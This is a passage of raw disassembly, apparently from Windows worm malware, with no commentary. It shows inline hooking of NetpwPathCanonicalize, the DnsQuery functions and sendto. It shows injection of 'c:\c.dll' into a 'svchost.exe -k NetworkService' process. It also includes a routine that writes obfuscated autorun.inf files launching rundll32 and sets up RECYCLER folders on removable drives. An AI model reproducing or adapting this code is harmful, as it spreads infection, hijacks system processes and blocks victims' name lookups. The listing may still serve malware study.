push ebx ; Val
push esi ; Dst
call memset
add esp, 0Ch
mov [esi+28h], edi
mov ecx, [ebp+lpAddress]
mov [esi+24h], ecx
mov [ebp+var_20], ecx
mov [ebp+var_34], ebx
mov [ebp+var_38], 5
loc_9AB316: ; CODE XREF: sub_9AB2C9+9F�j
cmp ebx, 5
jge short loc_9AB375
mov eax, [ebp+var_20]
add eax, ebx
push eax
call loc_9B7EA0
mov [ebp+var_30], eax
lea ecx, [ebx+esi+4]
push eax ; Size
mov eax, [ebp+var_20]
add eax, ebx
push eax ; Src
push ecx ; Dst
call memcpy
add esp, 10h
mov al, [ebx+esi+4]
mov cl, al
and cl, 0FEh
cmp cl, 0E8h
jz short loc_9AB36A
cmp al, 0FFh
jnz short loc_9AB35B
mov al, [ebx+esi+5]
cmp al, 25h
jz short loc_9AB36A
cmp al, 15h
jz short loc_9AB36A
loc_9AB35B: ; CODE XREF: sub_9AB2C9+84�j
mov eax, [ebp+var_30]
add ebx, eax
mov [esi], ebx
mov [ebp+var_34], ebx
mov ecx, [ebp+lpAddress]
jmp short loc_9AB316
; ---------------------------------------------------------------------------
loc_9AB36A: ; CODE XREF: sub_9AB2C9+80�j
; sub_9AB2C9+8C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
jmp loc_9AB402
; ---------------------------------------------------------------------------
loc_9AB375: ; CODE XREF: sub_9AB2C9+50�j
lea eax, [ebx+esi]
mov byte ptr [eax+4], 0E9h
mov edx, [esi]
sub edx, ebx
sub edx, esi
lea edx, [edx+ecx-9]
mov [eax+5], edx
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push dword ptr [esi] ; dwSize
push ecx ; lpAddress
mov ebx, VirtualProtect
call ebx ; VirtualProtect
test eax, eax
jz short loc_9AB3FB
mov [ebp+Src], 0E9h
sub edi, [ebp+lpAddress]
sub edi, 5
mov [ebp+var_3F], edi
push 0Fh ; nPriority
push [ebp+hThread] ; hThread
mov edi, SetThreadPriority
call edi ; SetThreadPriority
push 5 ; Size
lea eax, [ebp+Src]
push eax ; Src
push [ebp+lpAddress] ; Dst
call memcpy
add esp, 0Ch
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call edi ; SetThreadPriority
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push [ebp+flOldProtect] ; flNewProtect
push dword ptr [esi] ; dwSize
push [ebp+lpAddress] ; lpAddress
call ebx ; VirtualProtect
mov [ebp+var_2C], 1
jmp short loc_9AB3FB
; ---------------------------------------------------------------------------
loc_9AB3E8: ; DATA XREF: .text:stru_9A4100�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB3EC: ; DATA XREF: .text:stru_9A4100�o
mov esp, [ebp+ms_exc.old_esp]
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call SetThreadPriority
loc_9AB3FB: ; CODE XREF: sub_9AB2C9+D3�j
; sub_9AB2C9+11D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_2C]
loc_9AB402: ; CODE XREF: sub_9AB2C9+A7�j
call __SEH_epilog
retn
sub_9AB2C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB408(LPCSTR lpLibFileName,LPCSTR lpProcName,int,int)
sub_9AB408 proc near ; CODE XREF: sub_9AB47D+14�p
; sub_9AB49A+14�p ...
lpLibFileName = dword ptr 8
lpProcName = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
push [ebp+lpLibFileName] ; lpModuleName
xor edi, edi
call GetModuleHandleA
test eax, eax
jnz short loc_9AB428
push [ebp+lpLibFileName] ; lpLibFileName
call LoadLibraryA
test eax, eax
jz short loc_9AB478
loc_9AB428: ; CODE XREF: sub_9AB408+11�j
push esi
push [ebp+lpProcName] ; lpProcName
push eax ; hModule
call GetProcAddress
mov esi, eax
test esi, esi
jz short loc_9AB477
push 40h ; flProtect
push 103000h ; flAllocationType
push 2Ch ; dwSize
push 0 ; lpAddress
call VirtualAlloc
test eax, eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jz short loc_9AB477
mov edx, [ebp+arg_8]
push esi ; lpAddress
mov ecx, eax
call sub_9AB2C9
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9AB477
push 8000h ; dwFreeType
push eax ; dwSize
push lpAddress ; lpAddress
call VirtualFree
loc_9AB477: ; CODE XREF: sub_9AB408+2F�j
; sub_9AB408+49�j ...
pop esi
loc_9AB478: ; CODE XREF: sub_9AB408+1E�j
mov eax, edi
pop edi
pop ebp
retn
sub_9AB408 endp
; =============== S U B R O U T I N E =======================================
sub_9AB47D proc near ; CODE XREF: sub_9A798D+1B6�p
; sub_9A798D+1D0�p
push offset lpAddress ; int
push offset sub_9AAD64 ; int
push offset aNetpwpathcanon ; "NetpwPathCanonicalize"
push offset dword_9A410C ; lpLibFileName
call sub_9AB408
add esp, 10h
retn
sub_9AB47D endp
; =============== S U B R O U T I N E =======================================
sub_9AB49A proc near ; CODE XREF: sub_9A798D+29�p
push offset dword_9BB190 ; int
push offset sub_9AADCD ; int
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call sub_9AB408
add esp, 10h
retn
sub_9AB49A endp
; =============== S U B R O U T I N E =======================================
sub_9AB4B7 proc near ; CODE XREF: sub_9A798D+1E5�p
push ebx
push ebp
push esi
push edi
push offset dword_9BB194 ; int
push offset sub_9AAE58 ; int
push offset aDnsquery_a ; "DnsQuery_A"
mov esi, offset aDnsapi_dll ; "dnsapi.dll"
push esi ; lpLibFileName
call sub_9AB408
push offset dword_9BB198 ; int
push offset sub_9AAF13 ; int
push offset aDnsquery_utf8 ; "DnsQuery_UTF8"
push esi ; lpLibFileName
mov edi, eax
call sub_9AB408
push offset dword_9BB19C ; int
push offset sub_9AAFA9 ; int
push offset aDnsquery_w ; "DnsQuery_W"
push esi ; lpLibFileName
mov ebx, eax
call sub_9AB408
push offset dword_9BB1A0 ; int
push offset loc_9AB04A ; int
push offset aQuery_main ; "Query_Main"
push esi ; lpLibFileName
mov ebp, eax
call sub_9AB408
add esp, 40h
test edi, edi
jz short loc_9AB52E
test ebx, ebx
jz short loc_9AB52E
test ebp, ebp
jz short loc_9AB52E
xor eax, eax
inc eax
jmp short loc_9AB530
; ---------------------------------------------------------------------------
loc_9AB52E: ; CODE XREF: sub_9AB4B7+68�j
; sub_9AB4B7+6C�j ...
xor eax, eax
loc_9AB530: ; CODE XREF: sub_9AB4B7+75�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_9AB4B7 endp
; =============== S U B R O U T I N E =======================================
sub_9AB535 proc near ; CODE XREF: sub_9A798D+1BB�p
push offset ModuleName ; "dnsrslvr.dll"
call GetModuleHandleA
test eax, eax
mov dword_9BB1A8, eax
jnz short loc_9AB54A
retn
; ---------------------------------------------------------------------------
loc_9AB54A: ; CODE XREF: sub_9AB535+12�j
push offset dword_9BB1A4 ; int
push offset sub_9AB296 ; int
push offset aSendto ; "sendto"
push offset aWs2_32_dll ; "ws2_32.dll"
call sub_9AB408
add esp, 10h
retn
sub_9AB535 endp
; =============== S U B R O U T I N E =======================================
sub_9AB567 proc near ; CODE XREF: StartAddress:loc_9A7803�p
push esi
xor esi, esi
loc_9AB56A: ; CODE XREF: sub_9AB567+21�j
push offset aSvchost_exeKNe ; "svchost.exe -k NetworkService"
call sub_9ACF3E
test eax, eax
pop ecx
jnz short loc_9AB58C
push 3E8h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 14h
jl short loc_9AB56A
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AB58C: ; CODE XREF: sub_9AB567+10�j
push offset FileName ; "c:\\c.dll"
push eax ; dwProcessId
call sub_9ACC9F
pop ecx
pop ecx
pop esi
retn
sub_9AB567 endp
; =============== S U B R O U T I N E =======================================
sub_9AB59B proc near ; CODE XREF: StartAddress+58�p
push esi
xor esi, esi
loc_9AB59E: ; CODE XREF: sub_9AB59B+21�j
push offset aYsecurity ; "ySecurity"
call sub_9ACC1F
test eax, eax
pop ecx
jnz short loc_9AB5C0
push 3E8h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 14h
jl short loc_9AB59E
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AB5C0: ; CODE XREF: sub_9AB59B+10�j
push offset FileName ; "c:\\c.dll"
push eax ; dwProcessId
call sub_9ACC9F
pop ecx
pop ecx
pop esi
retn
sub_9AB59B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AB5CF(char *Dest)
sub_9AB5CF proc near ; CODE XREF: sub_9AB855+1AF�p
; sub_9AB855+1E6�p ...
Dest = dword ptr 4
call rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short locret_9AB5F6
push esi
mov esi, edx
loc_9AB5E2: ; CODE XREF: sub_9AB5CF+24�j
push offset asc_9A41FC ; " "
push [esp+8+Dest] ; Dest
call strcat
dec esi
pop ecx
pop ecx
jnz short loc_9AB5E2
pop esi
locret_9AB5F6: ; CODE XREF: sub_9AB5CF+E�j
retn
sub_9AB5CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB5F7(char *Dest)
sub_9AB5F7 proc near ; CODE XREF: sub_9AB6D6+59�p
; sub_9AB6D6+7D�p ...
Source = byte ptr -4
var_3 = byte ptr -3
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, rand
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB638
push edi
mov edi, edx
loc_9AB611: ; CODE XREF: sub_9AB5F7+25�j
; sub_9AB5F7+29�j ...
call esi ; rand
and al, 1Fh
inc al
cmp al, 0Dh
mov [ebp+Source], al
jz short loc_9AB611
cmp al, 0Ah
jz short loc_9AB611
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
mov [ebp+var_3], 0
call strcat
dec edi
pop ecx
pop ecx
jnz short loc_9AB611
pop edi
loc_9AB638: ; CODE XREF: sub_9AB5F7+15�j
pop esi
leave
retn
sub_9AB5F7 endp
; =============== S U B R O U T I N E =======================================
sub_9AB63B proc near ; CODE XREF: sub_9AB6D6:loc_9AB759�p
; sub_9AB7A5+4E�p ...
call rand
push 3
cdq
pop ecx
idiv ecx
sub edx, 0
jz short loc_9AB660
dec edx
jz short loc_9AB659
dec edx
jnz short locret_9AB66D
push offset asc_9A4208 ; "\n"
jmp short loc_9AB665
; ---------------------------------------------------------------------------
loc_9AB659: ; CODE XREF: sub_9AB63B+12�j
push offset asc_9A4204 ; "\r"
jmp short loc_9AB665
; ---------------------------------------------------------------------------
loc_9AB660: ; CODE XREF: sub_9AB63B+F�j
push offset asc_9A4200 ; "\r\n"
loc_9AB665: ; CODE XREF: sub_9AB63B+1C�j
; sub_9AB63B+23�j
push esi ; Dest
call strcat
pop ecx
pop ecx
locret_9AB66D: ; CODE XREF: sub_9AB63B+15�j
retn
sub_9AB63B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB66E(char *Dest,char)
sub_9AB66E proc near ; CODE XREF: sub_9AB6D6+72�p
; sub_9AB7A5+20�p ...
Source = byte ptr -4
var_3 = byte ptr -3
Dest = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, rand
call esi ; rand
push 19h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AB6D3
push edi
mov edi, edx
loc_9AB687: ; CODE XREF: sub_9AB66E+62�j
cmp [ebp+arg_4], 0
jz short loc_9AB6A5
call esi ; rand
test al, 1
jnz short loc_9AB6A5
call esi ; rand
cdq
mov ecx, 80h
idiv ecx
add dl, 80h
mov [ebp+Source], dl
jmp short loc_9AB6BD
; ---------------------------------------------------------------------------
loc_9AB6A5: ; CODE XREF: sub_9AB66E+1D�j
; sub_9AB66E+23�j
call esi ; rand
cdq
push 1Ah
pop ecx
idiv ecx
add dl, 41h
mov [ebp+Source], dl
call esi ; rand
test al, 1
jz short loc_9AB6BD
or [ebp+Source], 20h
loc_9AB6BD: ; CODE XREF: sub_9AB66E+35�j
; sub_9AB66E+49�j
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
mov [ebp+var_3], 0
call strcat
dec edi
pop ecx
pop ecx
jnz short loc_9AB687
pop edi
loc_9AB6D3: ; CODE XREF: sub_9AB66E+14�j
pop esi
leave
retn
sub_9AB66E endp
; =============== S U B R O U T I N E =======================================
sub_9AB6D6 proc near ; CODE XREF: sub_9AB7A5+55�p
; sub_9AB7A5+A5�p ...
push esi
push edi
mov edi, rand
mov esi, eax
call edi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB763
push ebx
push ebp
mov ebp, edx
loc_9AB6F0: ; CODE XREF: sub_9AB6D6+89�j
call edi ; rand
push 3
cdq
pop ecx
idiv ecx
sub edx, 0
jz short loc_9AB723
dec edx
jz short loc_9AB752
dec edx
jnz short loc_9AB75E
call edi ; rand
push 1Eh
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB759
mov ebx, edx
loc_9AB711: ; CODE XREF: sub_9AB6D6+49�j
push offset asc_9A41FC ; " "
push esi ; Dest
call strcat
dec ebx
pop ecx
pop ecx
jnz short loc_9AB711
jmp short loc_9AB759
; ---------------------------------------------------------------------------
loc_9AB723: ; CODE XREF: sub_9AB6D6+25�j
push offset asc_9A420C ; ";"
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AB5F7
add esp, 0Ch
call edi ; rand
push 4
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB752
mov ebx, edx
loc_9AB745: ; CODE XREF: sub_9AB6D6+7A�j
push 1 ; char
push esi ; Dest
call sub_9AB66E
dec ebx
pop ecx
pop ecx
jnz short loc_9AB745
loc_9AB752: ; CODE XREF: sub_9AB6D6+28�j
; sub_9AB6D6+6B�j
push esi ; Dest
call sub_9AB5F7
pop ecx
loc_9AB759: ; CODE XREF: sub_9AB6D6+37�j
; sub_9AB6D6+4B�j
call sub_9AB63B
loc_9AB75E: ; CODE XREF: sub_9AB6D6+2B�j
dec ebp
jnz short loc_9AB6F0
pop ebp
pop ebx
loc_9AB763: ; CODE XREF: sub_9AB6D6+14�j
pop edi
pop esi
retn
sub_9AB6D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB766(char *Dest)
sub_9AB766 proc near ; CODE XREF: sub_9AB855+85�p
; sub_9AB855+149�p ...
Source = byte ptr -4
var_3 = byte ptr -3
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
jmp short loc_9AB79D
; ---------------------------------------------------------------------------
loc_9AB76F: ; CODE XREF: sub_9AB766+3A�j
mov al, [esi]
cmp al, 61h
mov [ebp+Source], al
mov [ebp+var_3], 0
jl short loc_9AB78E
cmp al, 7Ah
jg short loc_9AB78E
call rand
test al, 1
jz short loc_9AB78E
and [ebp+Source], 0DFh
loc_9AB78E: ; CODE XREF: sub_9AB766+14�j
; sub_9AB766+18�j ...
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call strcat
pop ecx
pop ecx
inc esi
loc_9AB79D: ; CODE XREF: sub_9AB766+7�j
cmp byte ptr [esi], 0
jnz short loc_9AB76F
pop esi
leave
retn
sub_9AB766 endp
; =============== S U B R O U T I N E =======================================
sub_9AB7A5 proc near ; CODE XREF: sub_9AB855+5E�p
; sub_9AB855+239�p
var_C = dword ptr -0Ch
push esi
mov esi, eax
push edi
push esi ; Dest
call sub_9AB5F7
mov [esp+0Ch+var_C], offset asc_9A4218 ; "["
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AB5F7
push 0 ; char
push esi ; Dest
call sub_9AB66E
mov edi, rand
add esp, 14h
call edi ; rand
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB7EC
push offset asc_9A4214 ; "]"
push esi ; Dest
call strcat
pop ecx
pop ecx
loc_9AB7EC: ; CODE XREF: sub_9AB7A5+38�j
push esi ; Dest
call sub_9AB5F7
pop ecx
call sub_9AB63B
mov eax, esi
call sub_9AB6D6
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB852
mov edi, edx
loc_9AB80D: ; CODE XREF: sub_9AB7A5+AB�j
push esi ; Dest
call sub_9AB5F7
push 0 ; char
push esi ; Dest
call sub_9AB66E
push esi ; Dest
call sub_9AB5F7
push offset asc_9A4210 ; "="
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AB5F7
push 0 ; char
push esi ; Dest
call sub_9AB66E
push esi ; Dest
call sub_9AB5F7
add esp, 28h
call sub_9AB63B
mov eax, esi
call sub_9AB6D6
dec edi
jnz short loc_9AB80D
loc_9AB852: ; CODE XREF: sub_9AB7A5+64�j
pop edi
pop esi
retn
sub_9AB7A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB855(char *Dest,int,char *Source,int)
sub_9AB855 proc near ; CODE XREF: sub_9ABA9B+55�p
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Memory = dword ptr -0Ch
Str1 = dword ptr -8
var_4 = dword ptr -4
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
Source = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
mov eax, offset aShellexecute ; "shellexecute"
push esi
mov esi, [ebp+Dest]
push edi
mov ecx, offset aOpen ; "open"
mov edx, offset aAction ; "action"
mov [ebp+var_24], eax
mov edi, offset aIcon ; "icon"
mov [ebp+var_38], eax
mov [ebp+var_14], eax
mov eax, esi
mov [ebp+var_28], ecx
mov [ebp+var_20], edi
mov [ebp+var_1C], edx
mov [ebp+var_34], edi
mov [ebp+var_30], edx
mov [ebp+var_2C], offset aUseautoplay1 ; "useautoplay=1"
mov [ebp+var_18], ecx
call sub_9AB6D6
mov edi, rand
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AB8BB
mov ebx, edx
loc_9AB8B1: ; CODE XREF: sub_9AB855+64�j
mov eax, esi
call sub_9AB7A5
dec ebx
jnz short loc_9AB8B1
loc_9AB8BB: ; CODE XREF: sub_9AB855+58�j
push esi ; Dest
call sub_9AB5F7
mov [esp+48h+var_48], offset asc_9A4218 ; "["
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AB5F7
push esi ; Dest
mov eax, offset aAutorun ; "autorun"
call sub_9AB766
add esp, 10h
call edi ; rand
test al, 1
jz short loc_9AB8F5
push offset asc_9A4214 ; "]"
push esi ; Dest
call strcat
pop ecx
pop ecx
loc_9AB8F5: ; CODE XREF: sub_9AB855+91�j
push esi ; Dest
call sub_9AB5F7
pop ecx
call sub_9AB63B
cmp [ebp+arg_C], 5
jnz short loc_9AB913
lea ebx, [ebp+var_28]
loc_9AB90A: ; CODE XREF: sub_9AB855+C9�j
mov [ebp+arg_C], 4
jmp short loc_9AB926
; ---------------------------------------------------------------------------
loc_9AB913: ; CODE XREF: sub_9AB855+B0�j
push 2
pop eax
cmp [ebp+arg_C], eax
jnz short loc_9AB920
lea ebx, [ebp+var_38]
jmp short loc_9AB90A
; ---------------------------------------------------------------------------
loc_9AB920: ; CODE XREF: sub_9AB855+C4�j
lea ebx, [ebp+var_18]
mov [ebp+arg_C], eax
loc_9AB926: ; CODE XREF: sub_9AB855+BC�j
mov eax, [ebp+arg_C]
test eax, eax
jle short loc_9AB956
mov [ebp+var_4], eax
loc_9AB930: ; CODE XREF: sub_9AB855+FC�j
call edi ; rand
cdq
idiv [ebp+arg_C]
mov esi, edx
call edi ; rand
cdq
idiv [ebp+arg_C]
dec [ebp+var_4]
lea eax, [ebx+esi*4]
mov ecx, edx
mov edx, [eax]
lea ecx, [ebx+ecx*4]
mov esi, [ecx]
mov [eax], esi
mov [ecx], edx
jnz short loc_9AB930
mov esi, [ebp+Dest]
loc_9AB956: ; CODE XREF: sub_9AB855+D6�j
mov eax, esi
call sub_9AB6D6
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
jle loc_9ABA78
loc_9AB96B: ; CODE XREF: sub_9AB855+21D�j
mov eax, [ebp+var_4]
mov eax, [ebx+eax*4]
push eax ; Src
mov [ebp+Str1], eax
call _strdup
push 3Dh ; Val
push eax ; Str
mov [ebp+Memory], eax
call strchr
add esp, 0Ch
test eax, eax
mov [ebp+var_10], eax
jz short loc_9AB994
mov byte ptr [eax], 0
loc_9AB994: ; CODE XREF: sub_9AB855+13A�j
push esi ; Dest
call sub_9AB5F7
mov eax, [ebp+Memory]
push esi ; Dest
call sub_9AB766
push esi ; Dest
call sub_9AB5F7
push offset asc_9A4210 ; "="
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AB5F7
mov eax, [ebp+var_10]
add esp, 18h
test eax, eax
jz short loc_9AB9CE
inc eax
push esi ; Dest
call sub_9AB766
loc_9AB9CB: ; CODE XREF: sub_9AB855+1DA�j
pop ecx
jmp short loc_9ABA4C
; ---------------------------------------------------------------------------
loc_9AB9CE: ; CODE XREF: sub_9AB855+16D�j
push offset aIcon ; "icon"
push [ebp+Str1] ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9ABA10
call edi ; rand
test al, 1
push esi ; Dest
mov eax, offset aSystemroot ; "%systemroot%"
jnz short loc_9AB9F2
mov eax, offset aWindir ; "%windir%"
loc_9AB9F2: ; CODE XREF: sub_9AB855+196�j
call sub_9AB766
pop ecx
push esi ; Dest
mov eax, offset aSystem32Shell3 ; "\\system32\\shell32.dll"
call sub_9AB766
push esi ; Dest
call sub_9AB5CF
push offset a4_0 ; ",4"
jmp short loc_9ABA43
; ---------------------------------------------------------------------------
loc_9ABA10: ; CODE XREF: sub_9AB855+18A�j
push offset aAction ; "action"
push [ebp+Str1] ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9ABA31
push offset Buffer ; Source
push esi ; Dest
call strcat
pop ecx
jmp short loc_9AB9CB
; ---------------------------------------------------------------------------
loc_9ABA31: ; CODE XREF: sub_9AB855+1CC�j
mov eax, [ebp+arg_4]
push esi ; Dest
call sub_9AB766
push esi ; Dest
call sub_9AB5CF
push [ebp+Source] ; Source
loc_9ABA43: ; CODE XREF: sub_9AB855+1B9�j
push esi ; Dest
call strcat
add esp, 10h
loc_9ABA4C: ; CODE XREF: sub_9AB855+177�j
push esi ; Dest
call sub_9AB5CF
call sub_9AB63B
mov eax, esi
call sub_9AB6D6
push [ebp+Memory] ; Memory
call free
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_C]
pop ecx
pop ecx
jl loc_9AB96B
loc_9ABA78: ; CODE XREF: sub_9AB855+110�j
mov eax, esi
call sub_9AB6D6
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9ABA96
mov edi, edx
loc_9ABA8C: ; CODE XREF: sub_9AB855+23F�j
mov eax, esi
call sub_9AB7A5
dec edi
jnz short loc_9ABA8C
loc_9ABA96: ; CODE XREF: sub_9AB855+233�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AB855 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABA9B(LPCSTR lpFileName,char *Source,int)
sub_9ABA9B proc near ; CODE XREF: sub_9ABB9F+401�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFileName = dword ptr 8
Source = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_9A42A0
call __SEH_prolog
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], esi
push 30000h ; dwBytes
push 40h ; uFlags
mov edi, GlobalAlloc
call edi ; GlobalAlloc
mov ebx, eax
mov [ebp+var_1C], ebx
test ebx, ebx
jz loc_9ABB6C
call rand
cdq
push 2
pop ecx
idiv ecx
test edx, edx
mov eax, offset aRundll32 ; "rundll32"
jnz short loc_9ABAE8
mov eax, offset Srch
loc_9ABAE8: ; CODE XREF: sub_9ABA9B+46�j
push [ebp+arg_8] ; int
push [ebp+Source] ; Source
push eax ; int
push ebx ; Dest
call sub_9AB855
push ebx ; Str
call strlen
add esp, 14h
lea eax, [eax+eax+4]
push eax ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov esi, eax
mov [ebp+var_20], esi
test esi, esi
jz short loc_9ABB6C
mov word ptr [esi], 0FEFFh
push ebx ; Str
call strlen
pop ecx
inc eax
push eax ; cchWideChar
lea eax, [esi+2]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ebx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9ABB6C
push 1F01FFh ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
push [ebp+lpFileName] ; lpFileName
push esi ; Str
call wcslen
pop ecx
shl eax, 1
push eax ; nNumberOfBytesToWrite
push esi ; lpBuffer
call sub_9AC7F0
add esp, 0Ch
test eax, eax
jz short loc_9ABB6C
push 120089h ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
loc_9ABB6C: ; CODE XREF: sub_9ABA9B+2D�j
; sub_9ABA9B+73�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9ABB83
; ---------------------------------------------------------------------------
loc_9ABB72: ; DATA XREF: .text:stru_9A42A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ABB76: ; DATA XREF: .text:stru_9A42A0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
mov esi, [ebp+var_20]
loc_9ABB83: ; CODE XREF: sub_9ABA9B+D5�j
test esi, esi
jz short loc_9ABB8E
push esi ; hMem
call GlobalFree
loc_9ABB8E: ; CODE XREF: sub_9ABA9B+EA�j
test ebx, ebx
jz short loc_9ABB99
push ebx ; hMem
call GlobalFree
loc_9ABB99: ; CODE XREF: sub_9ABA9B+F5�j
call __SEH_epilog
retn
sub_9ABA9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9ABB9F(LPVOID)
sub_9ABB9F proc near ; CODE XREF: sub_9AC151+7F�p
; DATA XREF: sub_9ABFD3+8B�o
Source = byte ptr -7B0h
var_6AD = byte ptr -6ADh
FindFileData = _WIN32_FIND_DATAA ptr -6ACh
var_56C = byte ptr -56Ch
var_469 = byte ptr -469h
Dest = byte ptr -468h
var_365 = byte ptr -365h
PathName = byte ptr -364h
var_261 = byte ptr -261h
var_260 = byte ptr -260h
var_15D = byte ptr -15Dh
FileName = byte ptr -15Ch
var_59 = byte ptr -59h
var_58 = byte ptr -58h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_30 = dword ptr -30h
FileSystemFlags = dword ptr -2Ch
Str1 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
hMem = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 7A0h
push offset stru_9A4328
call __SEH_prolog
mov edi, [ebp+arg_0]
mov [ebp+hMem], edi
xor esi, esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_40], esi
mov [ebp+FileSystemFlags], esi
call sub_9AD417
push esi ; nFileSystemNameSize
push esi ; lpFileSystemNameBuffer
lea eax, [ebp+FileSystemFlags]
push eax ; lpFileSystemFlags
push esi ; lpMaximumComponentLength
push esi ; lpVolumeSerialNumber
push esi ; nVolumeNameSize
push esi ; lpVolumeNameBuffer
push dword ptr [edi+4] ; lpRootPathName
call GetVolumeInformationA
test eax, eax
jz loc_9ABFB1
test byte ptr [ebp+FileSystemFlags+2], 8
jnz loc_9ABFB1
push 80012F5h ; Seed
call srand
mov esi, rand
call esi ; rand
cdq
push 4
pop ecx
idiv ecx
add edx, 5
push edx
lea eax, [ebp+var_3C]
push eax
call sub_9AC642
add esp, 0Ch
loc_9ABC12: ; CODE XREF: sub_9ABB9F+99�j
call esi ; rand
cdq
push 3
pop ecx
idiv ecx
inc edx
push edx
lea eax, [ebp+Str1]
push eax
call sub_9AC642
push offset aDll_0 ; "dll"
lea eax, [ebp+Str1]
push eax ; Str1
call strcmp
add esp, 10h
test eax, eax
jz short loc_9ABC12
call esi ; rand
cdq
push 10h
pop ecx
idiv ecx
test edx, edx
jz loc_9ABCFE
mov edi, 104h
push edi ; Count
push offset aRecycler ; "RECYCLER"
lea eax, [ebp+Dest]
push eax ; Dest
call strncpy
add esp, 0Ch
mov [ebp+var_365], 0
call esi ; rand
cdq
mov ebx, 2710h
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
